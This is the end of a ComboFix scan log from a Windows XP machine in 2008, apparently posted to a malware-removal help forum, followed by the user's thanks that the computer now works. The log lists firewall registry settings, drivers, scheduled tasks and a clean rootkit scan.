[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=
R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
R3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]
.
Contents of the 'Scheduled Tasks' folder
"2008-04-07 15:45:53 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-03-11 17:00:00 C:\WINDOWS\Tasks\Pareto UNS.job"
- C:\Program Files\Common Files\ParetoLogic\UUS\UUS.dll\Pareto_Update.exe
.
**************************************************************************
catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-06-03 17:46:07
Windows 5.1.2600 Service Pack 2 NTFS
scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
.
Completion time: 2008-06-03 17:47:30
ComboFix-quarantined-files.txt 2008-06-03 15:47:23
ComboFix2.txt 2008-06-03 12:05:43
ComboFix3.txt 2008-06-02 19:53:06
Pre-Run: 29,154,091,008 bytes free
Post-Run: 29,144,064,000 bytes free
180 --- E O F --- 2008-05-16 20:47:53
Hey bro, thanks a lot, the computer is working perfectly now.